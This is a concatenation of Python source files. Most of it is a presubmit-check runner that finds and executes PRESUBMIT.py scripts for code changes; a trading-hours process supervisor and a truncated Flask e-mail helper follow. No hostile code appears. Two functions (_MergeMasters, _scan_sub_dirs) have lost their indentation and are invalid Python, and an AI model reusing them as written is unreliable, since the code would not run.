  def SetDescriptionText(self, description):
    """Sets the full description text (including tags) to |description|.

    Also updates the list of tags."""
    self._full_description = description

    # From the description text, build up a dictionary of key/value pairs
    # plus the description minus all key/value or 'tag' lines.
    description_without_tags = []
    self.tags = {}
    for line in self._full_description.splitlines():
      m = self.TAG_LINE_RE.match(line)
      if m:
        self.tags[m.group('key')] = m.group('value')
      else:
        description_without_tags.append(line)

    # Change back to text and remove whitespace at end.
    self._description_without_tags = (
        '\n'.join(description_without_tags).rstrip())

  def AddDescriptionFooter(self, key, value):
    """Adds the given footer to the change description.

    Args:
      key: A string with the key for the git footer. It must conform to
        the git footers format (i.e. 'List-Of-Tokens') and will be case
        normalized so that each token is title-cased.
      value: A string with the value for the git footer.
    """
    description = git_footers.add_footer(
        self.FullDescriptionText(), git_footers.normalize_name(key), value)
    self.SetDescriptionText(description)

  def RepositoryRoot(self):
    """Returns the repository (checkout) root directory for this change,
    as an absolute path.
    """
    return self._local_root

  def __getattr__(self, attr):
    """Return tags directly as attributes on the object."""
    if not re.match(r'^[A-Z_]*$', attr):
      raise AttributeError(self, attr)
    return self.tags.get(attr)

  def GitFootersFromDescription(self):
    """Return the git footers present in the description.

    Returns:
      footers: A dict of {footer: [values]} containing a multimap of the
        footers in the change description.
    """
    return git_footers.parse_footers(self.FullDescriptionText())

  def BugsFromDescription(self):
    """Returns all bugs referenced in the commit description."""
    tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
    footers = []
    parsed = self.GitFootersFromDescription()
    unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
    for unsplit_footer in unsplit_footers:
      footers += [b.strip() for b in unsplit_footer.split(',')]
    return sorted(set(tags + footers))

  def ReviewersFromDescription(self):
    """Returns all reviewers listed in the commit description."""
    # We don't support a 'R:' git-footer for reviewers; that is in metadata.
    tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
    return sorted(set(tags))

  def TBRsFromDescription(self):
    """Returns all TBR reviewers listed in the commit description."""
    tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
    # TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
    # programmatically determined by self-CR+1s.
    footers = self.GitFootersFromDescription().get('Tbr', [])
    return sorted(set(tags + footers))

  # TODO(crbug.com/753425): Delete these once we're sure they're unused.
  @property
  def BUG(self):
    return ','.join(self.BugsFromDescription())

  @property
  def R(self):
    return ','.join(self.ReviewersFromDescription())

  @property
  def TBR(self):
    return ','.join(self.TBRsFromDescription())

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    raise NotImplementedError()

  def AffectedFiles(self, include_deletes=True, file_filter=None):
    """Returns a list of AffectedFile instances for all files in the change.

    Args:
      include_deletes: If false, deleted files will be filtered out.
      file_filter: An additional filter to apply.

    Returns:
      [AffectedFile(path, action), AffectedFile(path, action)]
    """
    affected = list(filter(file_filter, self._affected_files))

    if include_deletes:
      return affected
    return list(filter(lambda x: x.Action() != 'D', affected))

  def AffectedTestableFiles(self, include_deletes=None, **kwargs):
    """Return a list of the existing text files in a change."""
    if include_deletes is not None:
      # Typo fix: the message previously said 'AffectedTeestableFiles'.
      warn('AffectedTestableFiles(include_deletes=%s)'
           ' is deprecated and ignored' % str(include_deletes),
           category=DeprecationWarning,
           stacklevel=2)
    return list(filter(
        lambda x: x.IsTestableFile(),
        self.AffectedFiles(include_deletes=False, **kwargs)))

  def AffectedTextFiles(self, include_deletes=None):
    """An alias to AffectedTestableFiles for backwards compatibility."""
    return self.AffectedTestableFiles(include_deletes=include_deletes)

  def LocalPaths(self):
    """Convenience function."""
    return [af.LocalPath() for af in self.AffectedFiles()]

  def AbsoluteLocalPaths(self):
    """Convenience function."""
    return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]

  def RightHandSideLines(self):
    """An iterator over all text lines in 'new' version of changed files.

    Lists lines from new or modified text files in the change.

    This is useful for doing line-by-line regex checks, like checking for
    trailing whitespace.

    Yields:
      a 3 tuple:
        the AffectedFile instance of the current file;
        integer line number (1-based); and
        the contents of the line as a string.
    """
    return _RightHandSideLinesImpl(
        x for x in self.AffectedFiles(include_deletes=False)
        if x.IsTestableFile())

  def OriginalOwnersFiles(self):
    """A map from path names of affected OWNERS files to their old content."""
    def owners_file_filter(f):
      return 'OWNERS' in os.path.split(f.LocalPath())[1]
    files = self.AffectedFiles(file_filter=owners_file_filter)
    return {f.LocalPath(): f.OldContents() for f in files}
class GitChange(Change):
  """A Change backed by a git checkout."""
  _AFFECTED_FILES = GitAffectedFile
  scm = 'git'

  def AllFiles(self, root=None):
    """List all files under source control in the repo."""
    root = root or self.RepositoryRoot()
    # core.quotePath=false keeps non-ASCII paths literal instead of escaped.
    cmd = ['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.']
    return subprocess.check_output(cmd, cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
  """Finds all presubmit files that apply to a given set of source files.

  If inherit-review-settings-ok is present right under root, looks for
  PRESUBMIT.py in directories enclosing root.

  Args:
    files: An iterable container containing file paths.
    root: Path where to stop searching.

  Return:
    List of absolute paths of the existing PRESUBMIT.py scripts.
  """
  files = [normpath(os.path.join(root, f)) for f in files]

  # Every distinct directory that directly contains an affected file.
  directories = {os.path.dirname(f) for f in files}

  # Ignore root if inherit-review-settings-ok is present.
  if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
    root = None

  # Walk each directory up towards root (or the filesystem root), collecting
  # every enclosing directory exactly once.
  candidates = set()
  for directory in directories:
    while directory not in candidates:
      candidates.add(directory)
      if directory == root:
        break
      parent = os.path.dirname(directory)
      if parent == directory:
        # We hit the system root directory.
        break
      directory = parent

  # Look for PRESUBMIT.py in all candidate directories.
  results = []
  for directory in sorted(candidates):
    try:
      entries = os.listdir(directory)
    except OSError:
      continue
    for entry in entries:
      full_path = os.path.join(directory, entry)
      if (os.path.isfile(full_path)
          and re.match(r'PRESUBMIT.*\.py$', entry)
          and not entry.startswith('PRESUBMIT_test')):
        results.append(full_path)

  logging.debug('Presubmit files: %s', ','.join(results))
  return results
class GetTryMastersExecuter(object):
  @staticmethod
  def ExecPresubmitScript(script_text, presubmit_path, project, change):
    """Executes GetPreferredTryMasters() from a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: Project script to run.
      project: Project name to pass to presubmit script for bot selection.

    Return:
      A map of try masters to map of builders to set of tests.

    Raises:
      PresubmitFailure: if the script raises, or defines the hook with the
          wrong number of arguments.
    """
    context = {}
    try:
      # NOTE: exec of presubmit scripts is by design here; the script text
      # comes from the user's own checkout, not untrusted input.
      exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
           context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s'
                             % (presubmit_path, e))

    function_name = 'GetPreferredTryMasters'
    if function_name not in context:
      return {}
    get_preferred_try_masters = context[function_name]
    # inspect.getargspec() was removed in Python 3.11; getfullargspec() is a
    # drop-in replacement for this positional-argument count check.
    if len(inspect.getfullargspec(get_preferred_try_masters)[0]) != 2:
      raise PresubmitFailure(
          'Expected function "GetPreferredTryMasters" to take two arguments.')
    return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
  @staticmethod
  def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
    """Executes PostUploadHook() from a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: Project script to run.
      gerrit_obj: The GerritAccessor object.
      change: The Change object.

    Return:
      A list of results objects.

    Raises:
      PresubmitFailure: if the script raises, or defines the hook with the
          wrong number of arguments.
    """
    context = {}
    try:
      # NOTE: exec of presubmit scripts is by design here; the script text
      # comes from the user's own checkout, not untrusted input.
      exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
           context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s'
                             % (presubmit_path, e))

    function_name = 'PostUploadHook'
    if function_name not in context:
      # Return a list (not {}) to honor the documented contract; callers
      # extend() the result either way.
      return []
    post_upload_hook = context[function_name]
    # inspect.getargspec() was removed in Python 3.11; getfullargspec() is a
    # drop-in replacement for this positional-argument count check.
    if len(inspect.getfullargspec(post_upload_hook)[0]) != 3:
      raise PresubmitFailure(
          'Expected function "PostUploadHook" to take three arguments.')
    return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
                    changed_files,
                    repository_root,
                    default_presubmit,
                    project,
                    verbose,
                    output_stream):
  """Collects try masters from every applicable presubmit script.

  Args:
    changed_files: List of modified files.
    repository_root: The repository root.
    default_presubmit: A default presubmit script to execute in any case.
    project: Optional name of a project used in selecting trybots.
    verbose: Prints debug info.
    output_stream: A stream to write debug output to.

  Return:
    Map of try masters to map of builders to set of tests.
  """
  presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
  if not presubmit_files and verbose:
    output_stream.write('Warning, no PRESUBMIT.py found.\n')
  executer = GetTryMastersExecuter()
  results = {}

  if default_presubmit:
    if verbose:
      output_stream.write('Running default presubmit script.\n')
    fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        default_presubmit, fake_path, project, change))
  for filename in presubmit_files:
    filename = os.path.abspath(filename)
    if verbose:
      output_stream.write('Running %s\n' % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results = _MergeMasters(results, executer.ExecPresubmitScript(
        presubmit_script, filename, project, change))

  # Make sets to lists again for later JSON serialization.
  results = {
      master: {builder: list(tests) for builder, tests in builders.items()}
      for master, builders in results.items()
  }

  if results and verbose:
    output_stream.write('%s\n' % str(results))
  return results
def DoPostUploadExecuter(change,
                         gerrit_obj,
                         verbose):
  """Execute the post upload hook.

  Args:
    change: The Change object.
    gerrit_obj: The GerritAccessor object.
    verbose: Prints debug info.
  """
  presubmit_files = ListRelevantPresubmitFiles(
      change.LocalPaths(), change.RepositoryRoot())
  if not presubmit_files and verbose:
    sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
  executer = GetPostUploadExecuter()
  results = []
  # The root presubmit file should be executed after the ones in
  # subdirectories, i.e. specific post upload hooks run before general ones,
  # so walk the discovered files in reverse order.
  for filename in reversed(presubmit_files):
    filename = os.path.abspath(filename)
    if verbose:
      sys.stdout.write('Running %s\n' % filename)
    # Accept CRLF presubmit script.
    presubmit_script = gclient_utils.FileRead(filename, 'rU')
    results.extend(executer.ExecPresubmitScript(
        presubmit_script, filename, gerrit_obj, change))

  if not results:
    return 0

  sys.stdout.write('\n')
  sys.stdout.write('** Post Upload Hook Messages **\n')

  exit_code = 0
  for result in results:
    if result.fatal:
      exit_code = 1
    result.handle()
    sys.stdout.write('\n')

  return exit_code
class PresubmitExecuter(object):
  """Loads and runs a single PRESUBMIT.py script's checks."""

  def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
               thread_pool=None, parallel=False, gerrit_project=None):
    """
    Args:
      change: The Change object.
      committing: True if 'git cl land' is running, False if 'git cl upload' is.
      gerrit_obj: provides basic Gerrit codereview functionality.
      dry_run: if true, some Checks will be skipped.
      parallel: if true, all tests reported via input_api.RunTests for all
          PRESUBMIT files will be run in parallel.
    """
    self.change = change
    self.committing = committing
    self.gerrit = gerrit_obj
    self.verbose = verbose
    self.dry_run = dry_run
    # CC addresses accumulated from output_api by each executed script.
    self.more_cc = []
    self.thread_pool = thread_pool
    self.parallel = parallel
    self.gerrit_project = gerrit_project

  def ExecPresubmitScript(self, script_text, presubmit_path):
    """Executes a single presubmit script.

    Args:
      script_text: The text of the presubmit script.
      presubmit_path: The path to the presubmit file (this will be reported
          via input_api.PresubmitLocalPath()).

    Return:
      A list of result objects, empty if no problems.
    """
    # Change to the presubmit file's directory to support local imports.
    main_path = os.getcwd()
    presubmit_dir = os.path.dirname(presubmit_path)
    os.chdir(presubmit_dir)

    # Load the presubmit script into context.
    input_api = InputApi(self.change, presubmit_path, self.committing,
                         self.verbose, gerrit_obj=self.gerrit,
                         dry_run=self.dry_run, thread_pool=self.thread_pool,
                         parallel=self.parallel)
    output_api = OutputApi(self.committing)
    context = {}
    try:
      # The presubmit script comes from the user's own checkout; running it
      # with exec() is the intended mechanism, not an injection risk.
      exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
           context)
    except Exception as e:
      raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))

    # Check functions are later eval'ed with '*__args' (see
    # _run_check_function below), so stash the argument tuple in the context.
    context['__args'] = (input_api, output_api)

    # Get path of presubmit directory relative to repository root.
    # Always use forward slashes, so that path is same in *nix and Windows
    root = input_api.change.RepositoryRoot()
    rel_path = os.path.relpath(presubmit_dir, root)
    rel_path = rel_path.replace(os.path.sep, '/')

    # Get the URL of git remote origin and use it to identify host and project
    host = ''
    if self.gerrit and self.gerrit.host:
      host = self.gerrit.host
    project = self.gerrit_project or ''

    # Prefix for test names
    prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)

    # Perform all the desired presubmit checks.
    results = []
    try:
      # PRESUBMIT_VERSION >= 2.0.0 means "run every Check* function found in
      # the script"; older scripts expose a single CheckChangeOn{Commit,Upload}
      # entry point instead.
      if 'PRESUBMIT_VERSION' in context and \
          [int(x) for x in context['PRESUBMIT_VERSION'].split('.')] >= [2, 0, 0]:
        for function_name in context:
          if not function_name.startswith('Check'):
            continue
          # *Commit checks run only when committing; *Upload checks only when
          # uploading. Unsuffixed Check* functions run in both modes.
          if function_name.endswith('Commit') and not self.committing:
            continue
          if function_name.endswith('Upload') and self.committing:
            continue
          logging.debug('Running %s in %s', function_name, presubmit_path)
          results.extend(
              self._run_check_function(function_name, context, prefix))
          logging.debug('Running %s done.', function_name)
          self.more_cc.extend(output_api.more_cc)
      else:  # Old format
        if self.committing:
          function_name = 'CheckChangeOnCommit'
        else:
          function_name = 'CheckChangeOnUpload'
        if function_name in context:
          logging.debug('Running %s in %s', function_name, presubmit_path)
          results.extend(
              self._run_check_function(function_name, context, prefix))
          logging.debug('Running %s done.', function_name)
          self.more_cc.extend(output_api.more_cc)
    finally:
      # Always clean up temporary files handed out by input_api, even when a
      # check raised.
      for f in input_api._named_temporary_files:
        os.remove(f)

    # Return the process to the original working directory.
    os.chdir(main_path)
    return results

  def _run_check_function(self, function_name, context, prefix):
    """Evaluates a presubmit check function, function_name, in the context
    provided. If LUCI_CONTEXT is enabled, it will send the result to ResultSink.
    Passes function_name and prefix to rdb_wrapper.setup_rdb. Returns results.

    Args:
      function_name: a string representing the name of the function to run
      context: a context dictionary in which the function will be evaluated
      prefix: a string describing prefix for ResultDB test id

    Returns: Results from evaluating the function call."""
    with rdb_wrapper.setup_rdb(function_name, prefix) as my_status:
      # The check function was defined by exec() above, so eval() against the
      # same context is how it is invoked; '__args' carries (input_api,
      # output_api).
      result = eval(function_name + '(*__args)', context)
      self._check_result_type(result)
      if any(res.fatal for res in result):
        my_status.status = rdb_wrapper.STATUS_FAIL
      return result

  def _check_result_type(self, result):
    """Helper function which ensures result is a list, and all elements are
    instances of OutputApi.PresubmitResult"""
    if not isinstance(result, (tuple, list)):
      raise PresubmitFailure('Presubmit functions must return a tuple or list')
    if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
      raise PresubmitFailure(
          'All presubmit results must be of types derived from '
          'output_api.PresubmitResult')
def DoPresubmitChecks(change,
                      committing,
                      verbose,
                      default_presubmit,
                      may_prompt,
                      gerrit_obj,
                      dry_run=None,
                      parallel=False,
                      json_output=None,
                      gerrit_project=None):
  """Runs all presubmit checks that apply to the files in the change.

  This finds all PRESUBMIT.py files in directories enclosing the files in the
  change (up to the repository root) and calls the relevant entrypoint function
  depending on whether the change is being committed or uploaded.

  Prints errors, warnings and notifications.  Prompts the user for warnings
  when needed.

  Args:
    change: The Change object.
    committing: True if 'git cl land' is running, False if 'git cl upload' is.
    verbose: Prints debug info.
    default_presubmit: A default presubmit script to execute in any case.
    may_prompt: Enable (y/n) questions on warning or error. If False,
        any questions are answered with yes by default.
    gerrit_obj: provides basic Gerrit codereview functionality.
    dry_run: if true, some Checks will be skipped.
    parallel: if true, all tests specified by input_api.RunTests in all
        PRESUBMIT files will be run in parallel.

  Return:
    1 if presubmit checks failed or 0 otherwise.
  """
  # os.environ is swapped (not mutated) so the original mapping can be
  # restored exactly in the finally block below.
  old_environ = os.environ
  try:
    # Make sure python subprocesses won't generate .pyc files.
    os.environ = os.environ.copy()
    os.environ['PYTHONDONTWRITEBYTECODE'] = '1'

    if committing:
      sys.stdout.write('Running presubmit commit checks ...\n')
    else:
      sys.stdout.write('Running presubmit upload checks ...\n')
    start_time = time_time()
    presubmit_files = ListRelevantPresubmitFiles(
        change.AbsoluteLocalPaths(), change.RepositoryRoot())
    if not presubmit_files and verbose:
      sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
    results = []
    thread_pool = ThreadPool()
    executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
                                 dry_run, thread_pool, parallel, gerrit_project)
    if default_presubmit:
      if verbose:
        sys.stdout.write('Running default presubmit script.\n')
      fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
      results += executer.ExecPresubmitScript(default_presubmit, fake_path)
    for filename in presubmit_files:
      filename = os.path.abspath(filename)
      if verbose:
        sys.stdout.write('Running %s\n' % filename)
      # Accept CRLF presubmit script.
      presubmit_script = gclient_utils.FileRead(filename, 'rU')
      results += executer.ExecPresubmitScript(presubmit_script, filename)

    # Tests queued by input_api.RunTests(parallel=True) only run here.
    results += thread_pool.RunAsync()

    # Bucket results into ERRORS / Warnings / Messages for display, and
    # track whether any fatal result or prompt-worthy warning was seen.
    messages = {}
    should_prompt = False
    presubmits_failed = False
    for result in results:
      if result.fatal:
        presubmits_failed = True
        messages.setdefault('ERRORS', []).append(result)
      elif result.should_prompt:
        should_prompt = True
        messages.setdefault('Warnings', []).append(result)
      else:
        messages.setdefault('Messages', []).append(result)

    sys.stdout.write('\n')
    for name, items in messages.items():
      sys.stdout.write('** Presubmit %s **\n' % name)
      for item in items:
        item.handle()
        sys.stdout.write('\n')

    total_time = time_time() - start_time
    if total_time > 1.0:
      sys.stdout.write(
          'Presubmit checks took %.1fs to calculate.\n\n' % total_time)

    if not should_prompt and not presubmits_failed:
      sys.stdout.write('Presubmit checks passed.\n')
    elif should_prompt:
      sys.stdout.write('There were presubmit warnings. ')
      # With may_prompt=False warnings are effectively auto-accepted.
      if may_prompt:
        presubmits_failed = not prompt_should_continue(
            'Are you sure you wish to continue? (y/N): ')
      else:
        sys.stdout.write('\n')

    if json_output:
      # Write the presubmit results to json output
      presubmit_results = {
          'errors': [
              error.json_format()
              for error in messages.get('ERRORS', [])
          ],
          'notifications': [
              notification.json_format()
              for notification in messages.get('Messages', [])
          ],
          'warnings': [
              warning.json_format()
              for warning in messages.get('Warnings', [])
          ],
          'more_cc': executer.more_cc,
      }

      gclient_utils.FileWrite(
          json_output, json.dumps(presubmit_results, sort_keys=True))

    global _ASKED_FOR_FEEDBACK
    # Ask for feedback one time out of 5.
    if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
      sys.stdout.write(
          'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
          'to figure out which PRESUBMIT.py was run, then run git blame\n'
          'on the file to figure out who to ask for help.\n')
      _ASKED_FOR_FEEDBACK = True

    return 1 if presubmits_failed else 0
  finally:
    os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
    """Process change options.

    Args:
        parser: The parser used to parse the arguments from command line.
        options: The arguments parsed from command line.

    Returns:
        A GitChange if the change root is a git repository, or a Change otherwise.
    """
    if options.files and options.all_files:
        parser.error('<files> cannot be specified when --all-files is set.')

    change_scm = scm.determine_scm(options.root)
    if change_scm != 'git' and not options.files:
        parser.error('<files> is not optional for unversioned directories.')

    # Pick the file list: explicit masks, everything under git, or git status.
    if options.files:
        change_files = _parse_files(options.files, options.recursive)
    elif options.all_files:
        change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
    else:
        change_files = scm.GIT.CaptureStatus(
            options.root, options.upstream or None)

    logging.info('Found %d file(s).', len(change_files))

    change_class = GitChange if change_scm == 'git' else Change
    return change_class(
        options.name,
        options.description,
        options.root,
        change_files,
        options.issue,
        options.patchset,
        options.author,
        upstream=options.upstream)
def _parse_gerrit_options(parser, options):
    """Process gerrit options.

    SIDE EFFECTS: Modifies options.author and options.description from Gerrit
    if options.gerrit_fetch is set.

    Args:
        parser: The parser used to parse the arguments from command line.
        options: The arguments parsed from command line.

    Returns:
        A GerritAccessor object if options.gerrit_url is set, or None otherwise.
    """
    gerrit_obj = None
    if options.gerrit_url:
        gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)

    if not options.gerrit_fetch:
        return gerrit_obj

    # --gerrit_fetch pulls the change metadata straight from Gerrit.
    if not (options.gerrit_url and options.issue and options.patchset):
        parser.error(
            '--gerrit_fetch requires --gerrit_url, --issue and --patchset.')

    options.author = gerrit_obj.GetChangeOwner(options.issue)
    options.description = gerrit_obj.GetChangeDescription(
        options.issue, options.patchset)

    logging.info('Got author: "%s"', options.author)
    logging.info('Got description: """\n%s\n"""', options.description)
    return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
    """Context manager that temporarily disables named canned checks.

    Each attribute of presubmit_canned_checks listed in *method_names* is
    replaced with a no-op returning []; the originals are restored on exit
    (even if the body raises). Unknown names are skipped with a warning.
    """
    filtered = {}
    try:
        for method_name in method_names:
            if not hasattr(presubmit_canned_checks, method_name):
                # Fix: logging.warn is a deprecated alias of logging.warning;
                # also use lazy %-style args instead of eager interpolation.
                logging.warning('Skipping unknown "canned" check %s', method_name)
                continue
            filtered[method_name] = getattr(presubmit_canned_checks, method_name)
            setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
        yield
    finally:
        # Always restore the patched checks.
        for name, method in filtered.items():
            setattr(presubmit_canned_checks, name, method)
def main(argv=None):
    """Command-line entry point: parse options, build the change, run hooks.

    Returns a process exit code: 0/1 from the executed checks, or 2 on
    PresubmitFailure (e.g. an out-of-date depot_tools).
    """
    parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
    # --commit / --upload are two views of the same boolean flag.
    hooks = parser.add_mutually_exclusive_group()
    hooks.add_argument('-c', '--commit', action='store_true',
                       help='Use commit instead of upload checks.')
    hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
                       help='Use upload instead of commit checks.')
    hooks.add_argument('--post_upload', action='store_true',
                       help='Run post-upload commit hooks.')
    parser.add_argument('-r', '--recursive', action='store_true',
                        help='Act recursively.')
    parser.add_argument('-v', '--verbose', action='count', default=0,
                        help='Use 2 times for more debug info.')
    parser.add_argument('--name', default='no name')
    parser.add_argument('--author')
    # Description may be given inline or via a file, not both.
    desc = parser.add_mutually_exclusive_group()
    desc.add_argument('--description', default='', help='The change description.')
    desc.add_argument('--description_file',
                      help='File to read change description from.')
    parser.add_argument('--issue', type=int, default=0)
    parser.add_argument('--patchset', type=int, default=0)
    parser.add_argument('--root', default=os.getcwd(),
                        help='Search for PRESUBMIT.py up to this directory. '
                        'If inherit-review-settings-ok is present in this '
                        'directory, parent directories up to the root file '
                        'system directories will also be searched.')
    parser.add_argument('--upstream',
                        help='Git only: the base ref or upstream branch against '
                        'which the diff should be computed.')
    parser.add_argument('--default_presubmit')
    parser.add_argument('--may_prompt', action='store_true', default=False)
    parser.add_argument('--skip_canned', action='append', default=[],
                        help='A list of checks to skip which appear in '
                        'presubmit_canned_checks. Can be provided multiple times '
                        'to skip multiple canned checks.')
    # Hidden/internal options (used by git-cl machinery).
    parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
    parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
    parser.add_argument('--gerrit_fetch', action='store_true',
                        help=argparse.SUPPRESS)
    parser.add_argument('--parallel', action='store_true',
                        help='Run all tests specified by input_api.RunTests in '
                        'all PRESUBMIT files in parallel.')
    parser.add_argument('--json_output',
                        help='Write presubmit errors to json output.')
    parser.add_argument('--all_files', action='store_true',
                        help='Mark all files under source control as modified.')
    parser.add_argument('files', nargs='*',
                        help='List of files to be marked as modified when '
                        'executing presubmit or post-upload hooks. fnmatch '
                        'wildcards can also be used.')
    parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
    options = parser.parse_args(argv)

    # Map -v count to a log level: 0 -> ERROR, 1 -> INFO, 2+ -> DEBUG.
    log_level = logging.ERROR
    if options.verbose >= 2:
        log_level = logging.DEBUG
    elif options.verbose:
        log_level = logging.INFO
    log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
                  '%(filename)s] %(message)s')
    logging.basicConfig(format=log_format, level=log_level)

    if options.description_file:
        options.description = gclient_utils.FileRead(options.description_file)
    # Note: _parse_gerrit_options may rewrite options.author/description.
    gerrit_obj = _parse_gerrit_options(parser, options)
    change = _parse_change(parser, options)

    try:
        if options.post_upload:
            return DoPostUploadExecuter(
                change,
                gerrit_obj,
                options.verbose)
        with canned_check_filter(options.skip_canned):
            return DoPresubmitChecks(
                change,
                options.commit,
                options.verbose,
                options.default_presubmit,
                options.may_prompt,
                gerrit_obj,
                options.dry_run,
                options.parallel,
                options.json_output,
                options.gerrit_project)
    except PresubmitFailure as e:
        print(e, file=sys.stderr)
        print('Maybe your depot_tools is out of date?', file=sys.stderr)
        return 2
if __name__ == '__main__':
    # Fix stdout/stderr encoding before any printing happens.
    fix_encoding.fix_encoding()
    try:
        sys.exit(main())
    except KeyboardInterrupt:
        sys.stderr.write('interrupted\n')
        sys.exit(2)
|
manage.py | import os
from multiprocessing import Process
from datetime import datetime
from time import sleep
def run():
    """Launch serve.py from the current working directory; blocks until it exits."""
    command = f'python3.7 {os.getcwd()}/serve.py'
    # For a sudo user instead:
    # os.system(f'echo "your password in here" |sudo -S {command}')
    os.system(command)
def close_program(keyword):
    """Kill (SIGKILL) every process whose `ps aux` line contains *keyword*."""
    import os
    listing = os.popen(f"ps aux | grep {keyword}").readlines()
    for line in listing:
        # Skip the grep process itself; column 1 of `ps aux` is the PID.
        if "grep" in line:
            continue
        pid = line.split()[1]
        # For a sudo user instead:
        # os.system(f'echo "your password in here" |sudo -S kill -9 {pid}')
        os.system(f'kill -9 {pid}')
def auth_time(current: datetime) -> bool:
    """Return True when *current* falls inside the trading sessions.

    Day session: 08:57-15:05; night session: 20:57-02:35 (wraps midnight).
    Weekend handling: all of Sunday, Saturday after the night session ends,
    and Monday before the day session starts are off-hours.
    """
    from datetime import time
    DAY_START = time(8, 57)    # day-session start/stop
    DAY_END = time(15, 5)
    NIGHT_START = time(20, 57) # night-session start/stop
    NIGHT_END = time(2, 35)

    # Bug fix: the original called current.today().weekday(). datetime.today()
    # is a classmethod returning *now*, so the weekday of the wall clock was
    # used instead of the weekday of the `current` argument.
    weekday = current.weekday()
    now = current.time()

    if (weekday == 6 or
            (weekday == 5 and now > NIGHT_END) or
            (weekday == 0 and now < DAY_START)):
        return False
    if DAY_START <= now <= DAY_END:
        return True
    if now >= NIGHT_START:
        return True
    if now <= NIGHT_END:
        return True
    return False
def main():
    """Supervise serve.py: start it during trading hours, stop it outside.

    Polls every 30 seconds. `p` holds the running child Process, or None
    when no child should be alive.
    """
    p = None
    while True:
        current = datetime.now()
        status = auth_time(current)
        if p is None and status:
            p = Process(target=run)
            p.start()
            print("启动程序")
        if not status and p is not None:
            print("查杀子进程")
            close_program("serve.py")
            p.kill()
            print("关闭成功")
            # Bug fix: the child was restarted right here, which defeated the
            # off-hours shutdown and repeated the kill/restart cycle every
            # 30s while status stayed False. Leave p as None; the branch
            # above restarts the child when trading hours resume.
            p = None
        sleep(30)
if __name__ == '__main__':
    # Run the supervisor loop forever (Ctrl-C to stop).
    main()
|
emails.py | # -*- coding: utf-8 -*-
"""
:author: perfectbullet
:url:
:copyright: © 2018
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
    # Runs in a background thread (see send_mail); Flask-Mail needs an app
    # context to read the mail configuration.
    with app.app_context():
        mail.send(message)
def send_mail(to, subject, template, **kwargs):
    """Render *template* (.txt and .html variants) and e-mail it to *to*.

    The send happens in a background thread; the started Thread is returned
    so callers can join() it if needed.
    """
    full_subject = current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject
    message = Message(full_subject, recipients=[to])
    message.body = render_template(template + '.txt', **kwargs)
    message.html = render_template(template + '.html', **kwargs)
    # The worker thread needs the real app object; current_app is only a
    # proxy bound to this request context.
    app = current_app._get_current_object()
    thr = Thread(target=_send_async_mail, args=[app, message])
    thr.start()
    return thr
def send_confirm_email(user, token, to=None):
    """Send the account e-mail confirmation message (to *to*, or the user's address)."""
    send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
    """Send the password-reset message to the user's registered address."""
